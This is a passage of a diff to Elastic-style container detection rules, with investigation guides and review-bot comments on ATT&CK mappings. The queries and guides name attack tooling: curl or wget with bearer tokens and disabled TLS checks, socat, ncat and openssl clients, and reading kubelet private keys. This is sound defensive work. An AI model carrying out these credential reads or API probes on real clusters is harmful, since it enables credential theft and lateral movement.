 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
index 051c350fe9d..f09bad36a77 100644
--- a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/27"
 
 [rule]
 author = ["Elastic"]
@@ -119,6 +119,16 @@ id = "T1613"
 name = "Container and Resource Discovery"
 reference = "https://attack.mitre.org/techniques/T1613/"
 
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
+[[rule.threat.technique]]
+id = "T1049"
+name = "System Network Connections Discovery"
+reference = "https://attack.mitre.org/techniques/T1049/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
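Review bot: The added Execution block maps `T1204.002` Malicious File next to `T1059.004`, but a rule about an encoded payload decoded on the command line (the preceding hunk keeps `T1140` and adds `T1027`) evidences interpreter execution, not a user opening a delivered file; `T1059.004` alone is the defensible Execution mapping, so consider removing the `[[rule.threat.technique]]` `T1204` entry and its sub-technique. The same `T1059.004` + `T1204.002` pairing was added to the decoded-payload and file-cradle rules earlier in this patch, so whichever way this is decided should be applied to all three.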
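Review bot: `T1049` System Network Connections Discovery covers enumeration of established connections and listening sockets (`netstat`, `ss`), which a DNS enumeration rule does not observe; unless the query's tool list (outside this hunk) includes such utilities, the entry overstates coverage, and `T1016` System Network Configuration Discovery together with the existing `T1613` already describes the behaviour. If `T1049` stays, a one-line comment above its `[[rule.threat.technique]]` naming the command that justifies it would help the next reviewer.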
diff --git a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
index ebc953d4633..f5cef44a7f2 100644
--- a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/27"
 
 [rule]
 author = ["Elastic"]
@@ -96,6 +96,11 @@ process.interactive == true and container.id like "*"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
 [[rule.threat.technique]]
 id = "T1082"
 name = "System Information Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
new file mode 100644
index 00000000000..9a67f6171d9
--- /dev/null
+++ b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
@@ -0,0 +1,103 @@ +[metadata] +creation_date = "2026/02/02" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/02/09" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the access of the Kubelet certificate file inside a container. The Kubelet certificate file is +used to authenticate the container to the Kubernetes API server, and may be used by an adversary to gain access +to the Kubernetes API server or other resources within the cluster. These files are a common target for adversaries +to gain access to the cluster. There is a current limitation in the defend for containers file sensor that prevents +file open events from being logged for file open events without write intent. +""" +from = "now-6m" +index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Kubelet Certificate File Access Detected via Defend for Containers" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Kubelet Certificate File Access Detected via Defend for Containers + +This detection flags an interactive process inside a Linux container opening files under `/var/lib/kubelet/pki/`, which includes the kubelet client certificate and key used to authenticate to the Kubernetes API. Attackers who obtain these credentials can impersonate the node, enumerate cluster resources, and pivot to secrets or workloads. 
A common pattern is an operator exec’ing into a compromised pod, locating the kubelet cert/key pair, copying it out, then using it to query the API server from outside the container. + +### Possible investigation steps + +- Identify the pod/namespace/node and owning controller for the container, then confirm whether it should ever have access to host kubelet PKI (e.g., privileged DaemonSet, hostPath mount, node-agent tooling) or if this is an unexpected breakout indicator. +- Review the interactive session context (exec/attach/ssh), including who initiated it and the command history/TTY telemetry around the alert time, to determine whether this was routine debugging or suspicious enumeration. +- Inspect the container filesystem and recent file operations for evidence of credential harvesting (reads of kubelet client cert/key pairs, copies to temporary paths, archive creation, or outbound transfer tooling) and preserve artifacts for forensics. +- Correlate immediately after the access event for Kubernetes API activity using node credentials (unusual discovery, secret access, or cluster-wide queries) originating from the same workload identity, node, or egress address. +- Validate whether kubelet credentials were reused by reviewing API server audit logs for unexpected node identity actions, and rotate kubelet client certs/keys and isolate the workload if misuse is suspected. + +### False positive analysis + +- A cluster operator or SRE may exec into a privileged pod (e.g., a DaemonSet with hostPath access to `/var/lib/kubelet`) for node troubleshooting and use interactive shell commands to inspect or validate kubelet PKI files during incident response or routine maintenance. 
+- A legitimate containerized node-management or diagnostic workflow that runs interactively (e.g., invoked manually for verification) may open files under `/var/lib/kubelet/pki/` as part of validating kubelet certificate presence/permissions after upgrades, certificate rotation, or node reconfiguration. + +### Response and remediation + +- Immediately isolate the affected workload by scaling the pod/controller to zero or cordoning and draining the node if a privileged pod has host access to `/var/lib/kubelet/pki/`, and preserve the container filesystem and process list for forensics before teardown. +- Remove the execution path that enabled access by deleting or patching the pod/DaemonSet to drop `privileged`, `hostPID/hostNetwork`, and any `hostPath` mounts that expose `/var/lib/kubelet` and redeploy only from a known-good image and manifest. +- Rotate and reissue kubelet client certificates/keys on the impacted node(s) (or replace the node from autoscaling/immutable infrastructure) and verify the old credentials can no longer authenticate to the Kubernetes API server. +- Review Kubernetes API server audit logs for activity using the node identity around the access time (cluster-wide discovery, secret reads, token reviews, exec into other pods) and revoke/rotate any exposed service account tokens or secrets accessed during the window. +- Escalate to the Kubernetes platform/on-call security team immediately if the files include a kubelet client key, if the pod was privileged or had host mounts, or if API audit logs show node credential use from unexpected sources or unusual resource enumeration. +- Harden the cluster by enforcing policies that block hostPath access to `/var/lib/kubelet` and privileged pods (Pod Security Admission/Gatekeeper/Kyverno), limiting interactive exec/attach via RBAC, and monitoring for subsequent access attempts to kubelet PKI paths and related credential exfiltration tooling. 
+""" +references = [ + "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api", + "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster", + "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/" +] +risk_score = 21 +rule_id = "42de0740-8ed8-4b8b-995c-635b56a8bbf4" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +any where host.os.type == "linux" and process.interactive == true and container.id like "*" and ( + (event.category == "file" and event.type == "change" and event.action == "open" and file.path like "/var/lib/kubelet/pki/*") or + (event.category == "process" and event.type == "start" and event.action == "exec" and + ( + process.name in ("cat", "head", "tail", "more", "less", "sed", "awk") or + process.args in ( + "cat", "/bin/cat", "/usr/bin/cat", "/usr/local/bin/cat", + "head", "/bin/head", "/usr/bin/head", "/usr/local/bin/head", + "tail", "/bin/tail", "/usr/bin/tail", "/usr/local/bin/tail", + "more", "/bin/more", "/usr/bin/more", "/usr/local/bin/more", + "less", "/bin/less", "/usr/bin/less", "/usr/local/bin/less", + "sed", "/bin/sed", "/usr/bin/sed", "/usr/local/bin/sed", + "awk", "/bin/awk", "/usr/bin/awk", "/usr/local/bin/awk" + ) + ) and process.args like "*/var/lib/kubelet/pki/*") +) +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" 
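Review bot: The rule is mapped only to Discovery/T1613, yet what it detects — an interactive process opening, or feeding to `cat`/`head`/`sed` and friends, the kubelet client certificate and key under `/var/lib/kubelet/pki/` — is credential theft, and the investigation guide itself calls it credential harvesting. A Credential Access entry (T1552 Unsecured Credentials, sub-technique T1552.004 Private Keys) with a matching `"Tactic: Credential Access"` tag would make the mapping match the behaviour. The description's closing sentence is also garbled: `prevents file open events from being logged for file open events without write intent` should read `prevents file open events without write intent from being logged`, which is presumably why the file branch of the query requires `event.type == "change"`; stating that link in the description would help the next maintainer understand the otherwise odd condition.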
diff --git a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
index 8a09a1d7924..81381ad389b 100644
--- a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
+++ b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/06"
 
 [rule]
 author = ["Elastic"]
@@ -93,16 +93,16 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1033"
-name = "System Owner/User Discovery"
-reference = "https://attack.mitre.org/techniques/T1033/"
-
 [[rule.threat.technique]]
 id = "T1613"
 name = "Container and Resource Discovery"
 reference = "https://attack.mitre.org/techniques/T1613/"
 
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
index 1f55491b7bd..5e447e2221b 100644
--- a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
+++ b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
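Review bot: Swapping T1033 System Owner/User Discovery for T1082 System Information Discovery narrows the mapping of a rule whose name is "privilege boundary enumeration"; a rule with that name presumably keys on identity and privilege lookups, for which T1033 is the more specific technique. Unless the query, which is outside this hunk, no longer matches such commands, keeping T1033 alongside the added T1082 loses nothing and preserves the more precise coverage claim. If T1033 was removed deliberately, a line in the PR description saying why would save the next reviewer from raising it again.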
@@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/06" [rule] author = ["Elastic"] @@ -101,6 +101,11 @@ id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml index 94048cb61ca..6b685a4acac 100644 --- a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml +++ b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -66,7 +66,16 @@ Containers are lightweight, portable units that encapsulate applications and the risk_score = 21 rule_id = "1a289854-5b78-49fe-9440-8a8096b1ab50" severity = "low" -tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Command and Control", + "Tactic: Reconnaissance", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
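Review bot: `"Tactic: Reconnaissance"` in the rewritten `tags`, together with the TA0043/T1595 Active Scanning entry added in this file's `@@ -126,3 +130,29 @@` hunk, maps post-compromise behaviour to a pre-compromise tactic: ATT&CK scopes Reconnaissance to activity performed before initial access, whereas a scanner launched interactively inside a container is already inside the environment, which the existing T1046 Network Service Discovery mapping under Discovery covers. I would drop the Reconnaissance tag and threat entry and keep Discovery plus the new Command and Control/T1105 entry, so that tags and threat tables stay in step. The reordering of the tag list itself is fine, since it now matches the order used by the new rule files in this patch.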
@@ -112,11 +121,6 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1040"
-name = "Network Sniffing"
-reference = "https://attack.mitre.org/techniques/T1040/"
-
 [[rule.threat.technique]]
 id = "T1046"
 name = "Network Service Discovery"
@@ -126,3 +130,29 @@ reference = "https://attack.mitre.org/techniques/T1046/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1595"
+name = "Active Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/"
+
+[rule.threat.tactic]
+id = "TA0043"
+name = "Reconnaissance"
+reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml
index 61bf6736889..b571d34b507 100644
--- a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/27"
 
 [rule]
 author = ["Elastic"]
@@ -114,6 +114,11 @@ id = "T1518"
 name = "Software Discovery"
 reference = "https://attack.mitre.org/techniques/T1518/"
 
+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
new file mode 100644
index 00000000000..eca6ed47139
--- /dev/null
+++ b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
@@ -0,0 +1,151 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the execution of direct interactive Kubernetes API requests inside a container. An adversary may +need to execute direct interactive Kubernetes API requests to gain access to the Kubernetes API server or other resources +within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the +cluster, and may indicate an attempt to move laterally within the cluster. Note that this rule may not trigger if the +token is expanded within the process argument list, as the length of the "process.args" field may lead to the field being +ignored. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Direct Interactive Kubernetes API Request Detected via Defend for Containers" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. 
+ +### Investigating Direct Interactive Kubernetes API Request Detected via Defend for Containers + +The rule flags interactive use of curl, wget, openssl, busybox ssl_client, socat/ncat, or kubectl from inside a container to call the Kubernetes API with a bearer token, often with custom CA or insecure TLS options. An operator enumerates cluster resources and tests access with in-pod credentials, enabling lateral movement or privilege escalation; after landing in a pod, they read the service account token and query the API to list namespaces, pods, or secrets, or issue kubectl get/patch to probe or modify workloads. + +### Possible investigation steps + +- Map the container ID to its pod, namespace, node, image, and owning controller, and confirm whether this workload is expected to make direct Kubernetes API calls or allow interactive access. +- Determine how the interactive session was initiated and by whom by correlating with Kubernetes events and audit logs for exec/attach/ephemeral-container activity and runtime logs for TTY sessions, including the initiating principal and source IP. +- Correlate with API server audit logs to retrieve the exact requests (verbs, resources, namespaces), the authenticated subject (service account or user), and response codes to identify any successful access to sensitive resources like Secrets or workload-modifying actions. +- Inspect the pod for credential use and operator traces by checking recent process activity, shell history, environment variables, and access to service account token or kubeconfig files at expected mount paths. +- Assess scope and potential persistence by listing recent cluster objects created or modified by the same identity across namespaces (Pods, CronJobs, RoleBindings, Secrets) within the timeframe around the alert. 
+ +### False positive analysis + +- An administrator used kubectl interactively within a maintenance container to run get/list/patch commands during routine operations such as inspecting pods or updating labels, which matches expected administrative behavior. +- A developer ran openssl s_client, socat with SSL, or ncat --ssl interactively from within the container to troubleshoot TLS connectivity to a service endpoint, not the Kubernetes API server, causing the rule to fire despite benign intent. + +### Response and remediation + +- Immediately delete the affected pod to terminate interactive access, and apply a temporary NetworkPolicy in its namespace that blocks egress to the default/kubernetes service (API server) while you patch its ServiceAccount to set automountServiceAccountToken: false. +- Use API server audit logs and kubectl to enumerate actions taken by the pod’s ServiceAccount and revert any unauthorized objects it created or modified (Pods, CronJobs, RoleBindings, Secrets), and remove any attached ephemeral containers across the namespace. +- Rotate credentials and restore workloads by deleting any legacy ServiceAccount token Secret, restarting pods to issue new bound tokens, rebuilding the image from a trusted base, and redeploying with read-only rootfs and minimal RBAC verified via kubectl auth can-i. +- Escalate to incident response if audit logs show Secrets access or create/patch/update on workloads, if the ServiceAccount holds cluster-admin, or if the observed commands used curl -k/--insecure, wget --no-check-certificate, or openssl/socat/ncat with SSL to the API server. +- Harden the cluster by enforcing admission controls that deny kubectl exec/attach for non-admins, requiring automountServiceAccountToken: false by default and short-lived bound tokens where needed, restricting NetworkPolicies so only designated controllers can reach the API server, and adopting distroless images that omit curl/wget/openssl/ncat. 
+""" +risk_score = 21 +rule_id = "26a989d2-010e-4dae-b46b-689d03cc22b3" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + ( + process.name == "curl" and + process.args in ("-H", "--header") and + process.args like "*Authorization: Bearer *" and + ( + /* CA-specified */ + process.args in ("--cacert", "--capath") or + /* insecure */ + process.args in ("-k", "--insecure") + ) + ) or + ( + process.name == "wget" and + process.args like "--header*" and + process.args like "*Authorization: Bearer *" and + ( + /* CA-specified */ + process.args == "--ca-certificate" or + /* insecure */ + process.args == "--no-check-certificate" + ) + ) or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ("wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget") and + process.args like "--header*" and + process.args like "*Authorization: Bearer*" and + process.args == "--no-check-certificate" + ) or + ( + /* ssl_client is busybox-specific, so we need to handle it separately */ + process.name == "busybox" and + process.args == "ssl_client" and + process.args like "*Authorization: Bearer*" + ) or + (process.name == "openssl" and process.args == "s_client" and process.args == "-connect") or + (process.name == "socat" and process.args like~ "*ssl*") or + (process.name == "ncat" and process.args like "--ssl*") or + (process.name == "kubectl" and process.args in ("get", "list", "watch", "create", "patch", "update")) +) and +process.interactive == true and 
container.id like "*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml index 40bd33e4804..45afe8cf54e 100644 --- a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml +++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/06" [rule] author = ["Elastic"] 
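Review bot: The `openssl`, `socat` and `ncat` branches of the query fire on any interactive TLS client use (`openssl s_client -connect` to anything, any `socat` argument containing `ssl`, any `ncat --ssl*`) with no condition tying the target to the Kubernetes API, so they do not match the rule name or description and will be the main false-positive source the guide already anticipates; adding a target constraint to those three branches, for example `and process.args like~ ("*kubernetes*", "*:6443*")` with the exact hosts and ports adjusted per deployment, would keep them on topic. In the `kubectl` branch, `list` and `watch` are API verbs rather than kubectl subcommands (kubectl exposes `get`, `create`, `patch`, and watching is `get -w`), so as far as I know those two values never match, while `apply`, `delete` and `exec` are at least as relevant as `update`. The Execution/T1059.004 mapping fits the curl/wget/shell branches, but a rule that presents the in-pod service-account bearer token to the API server might also warrant a Credential Access mapping alongside Discovery.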
@@ -51,7 +51,15 @@ This detects an interactive session inside a running Linux container creating a risk_score = 47 rule_id = "b799720e-40d0-4dd6-9c9c-4f193a6ed643" severity = "medium" -tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -66,6 +74,11 @@ sequence by container.id, user.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -76,7 +89,15 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml new file mode 100644 index 00000000000..aa6c4f5a487 --- /dev/null +++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml 
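Review bot: The new Command and Control entry maps to T1071 Application Layer Protocol, but the sibling rule in this patch (discovery_suspicious_network_tool_launched_inside_a_container.toml) maps the fetch-and-run behaviour to T1105 Ingress Tool Transfer, which is the technique for pulling a file into the environment; unless the `sequence` (its first step is outside this hunk) matches something other than a download, T1105 is the closer match and the two rules should agree. The `@@ -66,6 +74,11 @@` and `@@ -76,7 +89,15 @@` hunks also put `[rule.threat.tactic]` before the technique tables and write `name` before `id`, the reverse of every other rule file in this patch (technique tables first, then `id`, `name`, `reference`); TOML accepts both, but the mixed layout makes these files harder to diff against the rest of the repository. Reordering to technique-first, id-first keeps them consistent.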
@@ -0,0 +1,115 @@ +[metadata] +creation_date = "2026/02/06" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/02/06" + +[rule] +author = ["Elastic"] +description = """ +This rule detects when an interactive process creates a file inside of a system binary location, inside of a running +container. The system binary locations are /etc, /root, /bin, /usr/bin, /usr/local/bin, and /entrypoint. Adversaries +may use these locations to create files that can be used to execute commands on the underlying host, or to evade +detection by security controls. +""" +from = "now-6m" +index = ["logs-cloud_defend.file*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "System Path File Creation and Execution Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating System Path File Creation and Execution Detected via Defend for Containers + +This detects an interactive session in a running Linux container creating new files under system binary paths like /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint, which often signals an attempt to tamper with execution flow or hide tooling. Attackers commonly gain a shell, then use curl/wget (or a busybox variant) from a writable staging area to drop a new executable into /usr/local/bin or overwrite an entrypoint script to ensure their code runs on start. 
+ +### Possible investigation steps + +- Capture the created file’s metadata (owner, permissions, timestamps) and contents/hash, then determine whether it is an executable/script or a modification to startup/auth/config behavior. +- Compare the file and its path against the container image baseline (layer diff) to confirm it was introduced at runtime and identify the interactive command that created it. +- Review the interactive session context (TTY, user, entry method) and surrounding command activity to assess intent and whether secrets or credentials were accessed. +- Pivot to related activity from the same session such as outbound connections, additional downloads to writable staging areas, or subsequent execution of the new file to gauge impact and scope. +- Check for persistence or host-impact setup by inspecting entrypoint/service definitions, PATH hijacks, mounted host paths, and any new cron/systemd/profile changes within the container. + +### False positive analysis + +- A container administrator troubleshooting interactively may use curl/wget (including via busybox wget) to fetch configuration or helper scripts and write them into /etc, /root, or /entrypoint to quickly test startup or runtime behavior changes. +- An interactive maintenance session may execute a script staged in /tmp or /dev/shm that drops a small wrapper binary or symlink into /usr/local/bin or /usr/bin to temporarily add debugging utilities or adjust PATH-resolved command behavior during incident response. + +### Response and remediation + +- Isolate the impacted container by removing it from service and blocking its egress, then preserve the container filesystem (or take a snapshot) so the created artifacts under /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint can be analyzed. 
+- Identify and remove the dropped or modified file(s) and any related persistence (e.g., altered /entrypoint script, PATH-hijacking binaries, modified shell profiles), then stop any processes launched from writable staging paths like /tmp, /dev/shm, /var/tmp, /run, /var/run, or /mnt. +- Redeploy the workload from a known-good image and verified configuration (including entrypoint and mounted volumes), rotate any secrets or tokens that could have been accessed in the interactive session, and validate the new pod/container does not recreate files in system binary locations. +- Escalate immediately to the incident response team if the created file is executable, replaces an entrypoint, initiates outbound downloads or connections, or if multiple containers show similar drops in system binary paths suggesting broader compromise. +- Harden by enforcing non-root, read-only root filesystem, and disallowing interactive exec into production containers, then restrict outbound network access and block write access to system binary locations via security policies and runtime controls.""" +risk_score = 47 +rule_id = "05a50000-9886-4695-ad33-3f990dc142e2" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +file where host.os.type == "linux" and event.type == "creation" and process.interactive == true and +file.path like ( + "/etc/*", "/root/*", "/bin/*", 